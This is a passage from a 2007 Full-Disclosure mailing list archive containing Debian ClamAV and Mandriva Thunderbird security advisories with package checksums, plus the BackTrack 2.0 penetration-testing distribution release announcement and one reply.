      Size/MD5 checksum: 38258 76d989cd3d071c5600d9239ec44d5e10
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_m68k.deb
      Size/MD5 checksum: 2170534 f35dcc6912fb0acd0b259acae8a9b9a2
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_m68k.deb
      Size/MD5 checksum: 35122 40b89cf394c25f79e17acc8dfb329b0d
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_m68k.deb
      Size/MD5 checksum: 146484 0098c6f52a629d5e1997ada7e752170e
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_m68k.deb
      Size/MD5 checksum: 251086 888c34801a5588dbc49f66e2acf1216a

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_mips.deb
      Size/MD5 checksum: 68062 9d6a26efae1f42e04162a5423ac317fb
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_mips.deb
      Size/MD5 checksum: 43874 f1cd8daafda6e91f288a8206d168f301
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_mips.deb
      Size/MD5 checksum: 2173058 6f5c70b355790ce6d4ff9c082e8506a3
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_mips.deb
      Size/MD5 checksum: 37682 a6706508bb4aaf8098968d60f8397be6
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_mips.deb
      Size/MD5 checksum: 195860 ea70cd36f235d4f2326307df22e06f69
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_mips.deb
      Size/MD5 checksum: 258188 9d874d790e66793797211be2a5a8ce86

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_mipsel.deb
      Size/MD5 checksum: 67650 9a9146d5667ccf4b111dd30d752f0a91
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_mipsel.deb
      Size/MD5 checksum: 43684 21fb06cf16611c12fdacdb8937ae92b1
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_mipsel.deb
      Size/MD5 checksum: 2173010 cc75d6c3f0f2fe5e597e79d547199a0f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_mipsel.deb
      Size/MD5 checksum: 37996 3aeecfbf91fa68a8a2175ab5a1caa013
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_mipsel.deb
      Size/MD5 checksum: 192220 c612ee4b274d41ee7c7a2f7c06665958
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_mipsel.deb
      Size/MD5 checksum: 255722 66f071a933589d62c11c161a49015702

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_powerpc.deb
      Size/MD5 checksum: 69390 57c24e63fb8b9eee0ba65f82ebce29c5
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_powerpc.deb
      Size/MD5 checksum: 44732 b79f087c2d6b9a6a0443257dd664cd28
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_powerpc.deb
      Size/MD5 checksum: 2173690 c13fd5c3eb38db179db4db8a25017bd1
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_powerpc.deb
      Size/MD5 checksum: 38886 902c240c9ba87fb45d2018d6e7071b9e
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_powerpc.deb
      Size/MD5 checksum: 187852 cbfcd17a7acf154d92f2324aa6cc9bc3
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_powerpc.deb
      Size/MD5 checksum: 265522 5803d3f1b222cfd28229a2e47076bcae

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_s390.deb
      Size/MD5 checksum: 67960 8abf60927cc67e39c30af5147038457f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_s390.deb
      Size/MD5 checksum: 43632 2087d0ad268f72be98b9c711543b4e15
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_s390.deb
      Size/MD5 checksum: 2172968 1e93b48d8eabf027a2885c44eeb2f694
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_s390.deb
      Size/MD5 checksum: 38974 15884fe049d94ea78d1392025734f719
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_s390.deb
      Size/MD5 checksum: 182844 894b86b7256a132a8c4d7ddf9adc3a0e
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_s390.deb
      Size/MD5 checksum: 270124 b804fa150e7e2c85e09ebb4fa5c15d8a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_sparc.deb
      Size/MD5 checksum: 64742 57b8bb2c49e2eb5360b8f105ed4b9f91
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_sparc.deb
      Size/MD5 checksum: 39522 59eb16c39f5c0dd52919b5fa3b2096fb
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_sparc.deb
      Size/MD5 checksum: 2171204 d66238ca67d4f22ff1145cf9ca393d9c
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_sparc.deb
      Size/MD5 checksum: 36890 5ffe48cc0fdea294f6382f73a668fe30
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_sparc.deb
      Size/MD5 checksum: 176144 1110fde33987418132d3ee6df0990ac8
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_sparc.deb
      Size/MD5 checksum: 265558 a2096ed70b830e852a72099dc9962641

  These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF7ewBXm3vHE4uyloRAp+FAKDK2+l25JCKPiiY/BJc6LCarkFLbgCfck0k
Wr6nOPT+eQ6P3Z+mSFoLA/o=
=7tJE
-----END PGP SIGNATURE-----

From muts at offensive-security.com Tue Mar 6 23:04:53 2007
From: muts at offensive-security.com (Mati Aharoni)
Date: Wed, 7 Mar 2007 01:04:53 +0200
Subject: [Full-disclosure] BackTrack v.2.0 Is out
Message-ID: <008101c76043$dbb8dfb0$932a9f10$@com>

Dear List,

BackTrack v.2.0 Final is out!

It's taken us almost 5 months to pull ourselves out of the beta stage.
Every time we thought we were done, a new idea or improvement would surface, and we just *had* to implement it. Many features were added, and many of the old (yet persistent) bugs were fixed. We honestly believe that BackTrack v 2.0 Final is the leanest, meanest and sexiest version to come out and hope that you enjoy using it as much as we did making it. Get yours at http://www.remote-exploit.org === Wireless Attacks @ their best === * We included a bunch of new drivers into the latest release and where able to make the desired packet injection functionalities to a wider audience. * By supporting the new ALFA USB hi-power devices there is now a great USB wireless dongle available which allows us to connect an external antenna and use BackTrack to attack even on Intel Macbook or VMware. * Broadcom 43xx based cards should be able to inject - a bit sloppy but should work. * The following drivers are now on our CD: * madwifi-ng (Patched for Injection) * hostap (Patched for Injection) * prism54 (Patched for Injection) * bcm43xx (Patched for Injection) * rtl8180 (Patched for Injection) * rtl8187 (Patched for Injection) * ipw2200 (Patched for Injection) * rt2570 (ASPj's Drivers) * rt2500 * rt61 * rt73 * ipw2100 * ipw3945 * acx100 * zd1211rw === Faster @ Work === * Most of our Main-menu entries have a grouping "All" menu, which allows the experienced user to quickly find a tool. * Less experienced users are guided through the new menu structure to find the right tools for the right tasks. === Alignment to Open Standards and Frameworks === * Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to Penetration Testing Methodologies and Assessment Frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares. * The most obvious alignment can be seen in the menu structure and framework documentation that has been included into BackTrack. 
* We suggest that you take your time to read the Frameworks, especially the ISSAF methodology guide.
* Unfortunately we were not able to include a newer OSSTMM paper because they did not release it to the public.

=== Cutting Edge Exploitation Framework & Information ===

* We put extra effort into integrating Metasploit Framework3 as well as the Stable Metasploit Framework2. Features such as db_autopwn, Wifi driver exploits etc. are all functional.
* Default password lists and online resources have been added and updated.

=== Latest Tech ===

* Packages are now based on the Slax 6 LZM format, which allowed us to get more space and work in a more stable environment
* We are running on a tweaked Kernel 2.6.20
* Apple patches are applied
* Broad Wireless Card Support
* Lorcon Wifi / Metasploit integration
* Wireshark Wifi Frame Injection patch
* Japanese Input support
* Over 300 updated security tools
* New section related to VoIP

=== Disappointments ===

As usual, Nessus is not included in BackTrack as Tenable forbids redistribution.

=== Community ===

* The public wiki project is available at http://backtrack.offensive-security.com. Please help us by providing entries in the HCL (Hardware compatibility list)
* Meet us at irc.freenode.org #remote-exploit

=== Thank You ===

* We would like to thank every developer, tester and our users. Without you, BackTrack would simply not be what it is today, but most of all we would like to thank our wives and families who supported us with this creative endeavor.

Signing out,

Muts, Max and Mjm

http://www.remote-exploit.org
http://www.offensive-security.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070307/859973ee/attachment.html

From jammer128 at gmail.com Wed Mar 7 00:23:39 2007
From: jammer128 at gmail.com (Jason Miller)
Date: Tue, 6 Mar 2007 18:23:39 -0600
Subject: [Full-disclosure] BackTrack v.2.0 Is out
In-Reply-To: <008101c76043$dbb8dfb0$932a9f10$@com>
References: <008101c76043$dbb8dfb0$932a9f10$@com>
Message-ID: <829b2de40703061623k2929f0afre616944d7dbd5821@mail.gmail.com>

Been following this project since before Whax. Still one of my fave penetration testing distros. :-)

On 3/6/07, Mati Aharoni wrote:
>
> Dear List,
>
> BackTrack v.2.0 Final is out!
>
> It's taken us almost 5 months to pull ourselves out of the beta stage. Every time we thought we were done, a new idea or improvement would surface, and we just *had* to implement it. Many features were added, and many of the old (yet persistent) bugs were fixed.
>
> We honestly believe that BackTrack v 2.0 Final is the leanest, meanest and sexiest version to come out and hope that you enjoy using it as much as we did making it.
>
> Get yours at http://www.remote-exploit.org
>
> === Wireless Attacks @ their best ===
>
> * We included a bunch of new drivers into the latest release and were able to make the desired packet injection functionalities available to a wider audience.
> * By supporting the new ALFA USB hi-power devices there is now a great USB wireless dongle available which allows us to connect an external antenna and use BackTrack to attack even on Intel Macbook or VMware.
> * Broadcom 43xx based cards should be able to inject - a bit sloppy but should work.
> * The following drivers are now on our CD:
>   * madwifi-ng (Patched for Injection)
>   * hostap (Patched for Injection)
>   * prism54 (Patched for Injection)
>   * bcm43xx (Patched for Injection)
>   * rtl8180 (Patched for Injection)
>   * rtl8187 (Patched for Injection)
>   * ipw2200 (Patched for Injection)
>   * rt2570 (ASPj's Drivers)
>   * rt2500
>   * rt61
>   * rt73
>   * ipw2100
>   * ipw3945
>   * acx100
>   * zd1211rw
>
> === Faster @ Work ===
>
> * Most of our Main-menu entries have a grouping "All" menu, which allows the experienced user to quickly find a tool.
> * Less experienced users are guided through the new menu structure to find the right tools for the right tasks.
>
> === Alignment to Open Standards and Frameworks ===
>
> * Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to Penetration Testing Methodologies and Assessment Frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.
> * The most obvious alignment can be seen in the menu structure and framework documentation that has been included in BackTrack.
> * We suggest that you take your time to read the Frameworks, especially the ISSAF methodology guide.
> * Unfortunately we were not able to include a newer OSSTMM paper because they did not release it to the public.
>
> === Cutting Edge Exploitation Framework & Information ===
>
> * We put extra effort into integrating Metasploit Framework3 as well as the Stable Metasploit Framework2. Features such as db_autopwn, Wifi driver exploits etc. are all functional.
> * Default password lists and online resources have been added and updated.
>
> === Latest Tech ===
>
> * Packages are now based on the Slax 6 LZM format, which allowed us to get more space and work in a more stable environment
> * We are running on a tweaked Kernel 2.6.20
> * Apple patches are applied
> * Broad Wireless Card Support
> * Lorcon Wifi / Metasploit integration
> * Wireshark Wifi Frame Injection patch
> * Japanese Input support
> * Over 300 updated security tools
> * New section related to VoIP
>
> === Disappointments ===
>
> As usual, Nessus is not included in BackTrack as Tenable forbids redistribution.
>
> === Community ===
>
> * The public wiki project is available at http://backtrack.offensive-security.com. Please help us by providing entries in the HCL (Hardware compatibility list)
> * Meet us at irc.freenode.org #remote-exploit
>
> === Thank You ===
>
> * We would like to thank every developer, tester and our users. Without you, BackTrack would simply not be what it is today, but most of all we would like to thank our wives and families who supported us with this creative endeavor.
>
> Signing out,
>
> Muts, Max and Mjm
>
> http://www.remote-exploit.org
> http://www.offensive-security.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/16f71027/attachment.html

From security at mandriva.com Wed Mar 7 01:56:47 2007
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 06 Mar 2007 18:56:47 -0700
Subject: [Full-disclosure] [ MDKSA-2007:052 ] - Updated Thunderbird packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:052
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mozilla-thunderbird
Date    : March 6, 2007
Affected: 2007.0, Corporate 3.0
_______________________________________________________________________

Problem Description:

A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 1.5.0.10. This update provides the latest Thunderbird to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
http://www.mozilla.org/security/announce/2007/mfsa2006-01.html
http://www.mozilla.org/security/announce/2007/mfsa2006-06.html
http://www.mozilla.org/security/announce/2007/mfsa2006-10.html
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.0:
d73cef3e4423ef6aeccd63ac79497c6e  2007.0/i586/mozilla-thunderbird-1.5.0.10-1mdv2007.0.i586.rpm
965e504ea75b78c6e635ea6a38a38bb6  2007.0/i586/mozilla-thunderbird-bg-1.5.0.10-1mdv2007.0.i586.rpm
942e112f107d12d349d98744ce587c5b  2007.0/i586/mozilla-thunderbird-ca-1.5.0.10-1mdv2007.0.i586.rpm
0ce0bb2087410e68f804621768f8c7f2  2007.0/i586/mozilla-thunderbird-cs-1.5.0.10-1mdv2007.0.i586.rpm
6d080060a704024a1d483ee48883a6c5  2007.0/i586/mozilla-thunderbird-da-1.5.0.10-1mdv2007.0.i586.rpm
22618f920657cd2d6c40da6db316e39f  2007.0/i586/mozilla-thunderbird-de-1.5.0.10-1mdv2007.0.i586.rpm
cce22b318b84e1253b7c5bb66da65a19  2007.0/i586/mozilla-thunderbird-devel-1.5.0.10-1mdv2007.0.i586.rpm
bd3e36e9570523b2474c433793584777  2007.0/i586/mozilla-thunderbird-el-1.5.0.10-1mdv2007.0.i586.rpm
ca81de87260cadcb163a5dee5319bdbc  2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.10-1mdv2007.0.i586.rpm
d68f93e05f308c74f06e707ba0952a01  2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.10-1mdv2007.0.i586.rpm
145d4c7babc60d7a82d313ada5f5d03f  2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.10-1mdv2007.0.i586.rpm
590fbecb711e50c04fc77522a0ccf8d7  2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.10-1mdv2007.0.i586.rpm
fcf7172153539fe1a78474eee59a48e9  2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.10-1mdv2007.0.i586.rpm
607fff520cb0747dbef7837bcb05fb67 2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.10-1mdv2007.0.i586.rpm 75969698970ee1e35a2e8b31d0f9945d 2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-1mdv2007.0.i586.rpm e1307b218c1e65216d7429481cfa0ba3 2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.10-1mdv2007.0.i586.rpm 1c51e0b62608745fd91f4d0267674541 2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.10-1mdv2007.0.i586.rpm ce9a77467fb993871990b12b4ad82492 2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.10-1mdv2007.0.i586.rpm e0cc383028a944d2c07c50777f6d3f14 2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.10-1mdv2007.0.i586.rpm e55280078287ed275c2685e33f5b9381 2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.10-1mdv2007.0.i586.rpm 643edc5d96ed4d5ff16cfd4c177fa1b4 2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.10-1mdv2007.0.i586.rpm 4036540cd8abb8ee46975d8ff8e39a8d 2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.10-1mdv2007.0.i586.rpm fb252bf6688273a5d6aae5eb034753db 2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.10-1mdv2007.0.i586.rpm df5c04c819bea04d2883dc703857c5d9 2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.10-1mdv2007.0.i586.rpm 4ba759b818e49976d412419153bcd239 2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-1mdv2007.0.i586.rpm 59fe920de5e879b0f8c4f48cec188c36 2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.10-1mdv2007.0.i586.rpm 85f6cd9eb62c95827989f742382890ba 2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.10-1mdv2007.0.i586.rpm e6f05601ce13f9b88864941b8c60acbd 2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.10-1mdv2007.0.i586.rpm 2c95b2f4b384c2c93de680b3ca9998a4 2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.10-1mdv2007.0.i586.rpm 134fd1a1f1c4e22c97383d7d64a5162c 2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-1mdv2007.0.i586.rpm dfbce9644ee9dd8ef2c57d39f5ad0daa 2007.0/i586/mozilla-thunderbird-es-1.5.0.10-1mdv2007.0.i586.rpm 692b55a319fd2e8b46cd2617454eb4cb 
2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.10-1mdv2007.0.i586.rpm 7c0b3cb59b74c0879edaad7feb7d4de2 2007.0/i586/mozilla-thunderbird-eu-1.5.0.10-1mdv2007.0.i586.rpm 2480853f936a609ef59ec3c930bcf21e 2007.0/i586/mozilla-thunderbird-fi-1.5.0.10-1mdv2007.0.i586.rpm 8d0d04ab5e525b60415d5540f2a74638 2007.0/i586/mozilla-thunderbird-fr-1.5.0.10-1mdv2007.0.i586.rpm 127b1d46adc024e3f583e311a8c90c1a 2007.0/i586/mozilla-thunderbird-ga-1.5.0.10-1mdv2007.0.i586.rpm ad6937fec743ebddc289f428ed4c590e 2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.10-1mdv2007.0.i586.rpm ee66b374e225e8023343ad7b9e39d128 2007.0/i586/mozilla-thunderbird-he-1.5.0.10-1mdv2007.0.i586.rpm 2a5cf1ba8f485050d64fce27876c5e53 2007.0/i586/mozilla-thunderbird-hu-1.5.0.10-1mdv2007.0.i586.rpm 5b7493e6e391748c58393513d20fc543 2007.0/i586/mozilla-thunderbird-it-1.5.0.10-1mdv2007.0.i586.rpm 16400b32fd07ddc23d050a0d87d67182 2007.0/i586/mozilla-thunderbird-ja-1.5.0.10-1mdv2007.0.i586.rpm 27fff844515f71af94b80d0603c90a56 2007.0/i586/mozilla-thunderbird-ko-1.5.0.10-1mdv2007.0.i586.rpm 312f51fdb7066b164ff047ffe702b59d 2007.0/i586/mozilla-thunderbird-lt-1.5.0.10-1mdv2007.0.i586.rpm d2900e5d0a2ab1ea8b52d44d7681e06a 2007.0/i586/mozilla-thunderbird-mk-1.5.0.10-1mdv2007.0.i586.rpm 84423a5d0e97d8c6c651d50cf057fd0e 2007.0/i586/mozilla-thunderbird-nb-1.5.0.10-1mdv2007.0.i586.rpm 88167643e533b2e38e909c0e54f8576c 2007.0/i586/mozilla-thunderbird-nl-1.5.0.10-1mdv2007.0.i586.rpm 57c3a5ab8f0c8cc818963a36aaa72855 2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.10-1mdv2007.0.i586.rpm 99bab76c25ac6ba62e8d75f46e5fbfea 2007.0/i586/mozilla-thunderbird-pl-1.5.0.10-1mdv2007.0.i586.rpm 154035410a1292e1d2af16a2be3911e5 2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.10-1mdv2007.0.i586.rpm 3e2662fa8c25634c36f7eba05b6062d3 2007.0/i586/mozilla-thunderbird-ru-1.5.0.10-1mdv2007.0.i586.rpm 0a26cb7fa4c4fc36e11fcefe4544cee1 2007.0/i586/mozilla-thunderbird-sk-1.5.0.10-1mdv2007.0.i586.rpm 70a37725b2973be071a46260d1630e2f 
2007.0/i586/mozilla-thunderbird-sl-1.5.0.10-1mdv2007.0.i586.rpm df7b38ac07581258fcfe47f3be64021c 2007.0/i586/mozilla-thunderbird-sv-1.5.0.10-1mdv2007.0.i586.rpm f60c6529247283e240cab74daf3bcaef 2007.0/i586/mozilla-thunderbird-tr-1.5.0.10-1mdv2007.0.i586.rpm 29addc886af8ca4695341606853b1549 2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.10-1mdv2007.0.i586.rpm 52742f3b6d2426c1ba01c2af91c68ec9 2007.0/i586/nsinstall-1.5.0.10-1mdv2007.0.i586.rpm 46b8dbe1a61ecd178d10d37d7dd82142 2007.0/SRPMS/mozilla-thunderbird-1.5.0.10-1mdv2007.0.src.rpm c6832073064476f9ac955fa74e1e28a8 2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-1mdv2007.0.src.rpm 0cd31f1a25e221fdbee15fcd57cd7484 2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 117e4eb10c1ef76fdad36dc3d1cd7df0 2007.0/x86_64/mozilla-thunderbird-1.5.0.10-1mdv2007.0.x86_64.rpm 9a5a0f36608618b119daf9e95ef28545 2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.10-1mdv2007.0.x86_64.rpm 377acc304d5a9af67bae159c2d08e067 2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.10-1mdv2007.0.x86_64.rpm ccc872d528bc0f92fd5a203223fc38e3 2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.10-1mdv2007.0.x86_64.rpm c5f07c39800696096274b3cd2da14fc0 2007.0/x86_64/mozilla-thunderbird-da-1.5.0.10-1mdv2007.0.x86_64.rpm a5f0db6f3ad60d80eb9be91d115a7900 2007.0/x86_64/mozilla-thunderbird-de-1.5.0.10-1mdv2007.0.x86_64.rpm 2d29c6c352ec59c07c825182e65ab46e 2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.10-1mdv2007.0.x86_64.rpm 4830a368991d379abb80b5efcf888963 2007.0/x86_64/mozilla-thunderbird-el-1.5.0.10-1mdv2007.0.x86_64.rpm 77948028ddf33360921f45e2ea89429b 2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.10-1mdv2007.0.x86_64.rpm b19d2df09984f95bda3584e0d9cbc6e2 2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.10-1mdv2007.0.x86_64.rpm 4e3aa10182da0cd7060ed704d9f0f206 2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.10-1mdv2007.0.x86_64.rpm dce1ea10980ee0af2c687b3dac3dc6d6 
2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.10-1mdv2007.0.x86_64.rpm ace7d862cb88f09bc4ec902aec7234dd 2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.10-1mdv2007.0.x86_64.rpm 6c4c83ad0c9c8bb3aae2eb13ab6d5aad 2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.10-1mdv2007.0.x86_64.rpm 5584994e25bb956b289c8e1419e84716 2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-1mdv2007.0.x86_64.rpm cc2a95f92f840d37d597d99925ed0807 2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.10-1mdv2007.0.x86_64.rpm d449d8378f437a6aec730423eeb08236 2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.10-1mdv2007.0.x86_64.rpm 9c2a68a5df80bcd825fcdf82596f68f9 2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.10-1mdv2007.0.x86_64.rpm c31651fee1d8784e02be0cdeb91b2ae0 2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.10-1mdv2007.0.x86_64.rpm a9f9519a1375f7cf4f314db44d06e895 2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.10-1mdv2007.0.x86_64.rpm 1cad629e72bfb698225a83e10d771dd9 2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.10-1mdv2007.0.x86_64.rpm 7d4058cd63eb22c5d44ed5c3502ea62e 2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.10-1mdv2007.0.x86_64.rpm 2c808ce923ea412f76d5a7ce33b05d03 2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.10-1mdv2007.0.x86_64.rpm c11cbc0d0fb7fd305c6b88f6aa0abcd9 2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.10-1mdv2007.0.x86_64.rpm 5a10c322d443fc96b74e19ebbbc0dfab 2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-1mdv2007.0.x86_64.rpm 7b9cc3ef30b02bdaceb6a376e86cca27 2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.10-1mdv2007.0.x86_64.rpm 0689876738362963affdc932894c7c36 2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.10-1mdv2007.0.x86_64.rpm e61ea72cea40113e5f52c1a08daeee07 2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.10-1mdv2007.0.x86_64.rpm a01bb2cd931e1d48be01115d85fd51ae 2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.10-1mdv2007.0.x86_64.rpm ce868e6fee5b6d158873aeb4c3ce706b 
2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-1mdv2007.0.x86_64.rpm 270c5522e6577b6538b16e825ea97b52 2007.0/x86_64/mozilla-thunderbird-es-1.5.0.10-1mdv2007.0.x86_64.rpm 5f88e2f1af9f88b97b1b86b39c07a8e6 2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.10-1mdv2007.0.x86_64.rpm 9876c47855193a11cc78a557e3c520f4 2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.10-1mdv2007.0.x86_64.rpm 16bdbcd61ed2f5e2478e1591ec7d07bf 2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.10-1mdv2007.0.x86_64.rpm 6762d343afe44e93dd1692e6cf164c74 2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.10-1mdv2007.0.x86_64.rpm 8b7fc49a5f09ccb34250cf8905b78a0c 2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.10-1mdv2007.0.x86_64.rpm 52dd38081e4b0de675a4f343db8c2304 2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.10-1mdv2007.0.x86_64.rpm eaf380221768913b91ab492759267367 2007.0/x86_64/mozilla-thunderbird-he-1.5.0.10-1mdv2007.0.x86_64.rpm acd42c36351e9e03658b16cde8989994 2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.10-1mdv2007.0.x86_64.rpm 21781fa31a5a64f2b000c67bd3ec64ec 2007.0/x86_64/mozilla-thunderbird-it-1.5.0.10-1mdv2007.0.x86_64.rpm e849f7b5e8753098e7d7e07eb078bcee 2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.10-1mdv2007.0.x86_64.rpm 5be83b9bab018b8ae03660223d3c9a83 2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.10-1mdv2007.0.x86_64.rpm 2ab3311d6100a7f97236103fe50735ac 2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.10-1mdv2007.0.x86_64.rpm 8279d4761e6f40941d70ad1863683724 2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.10-1mdv2007.0.x86_64.rpm d6e8f372ffce5a01e2b49059af8c1607 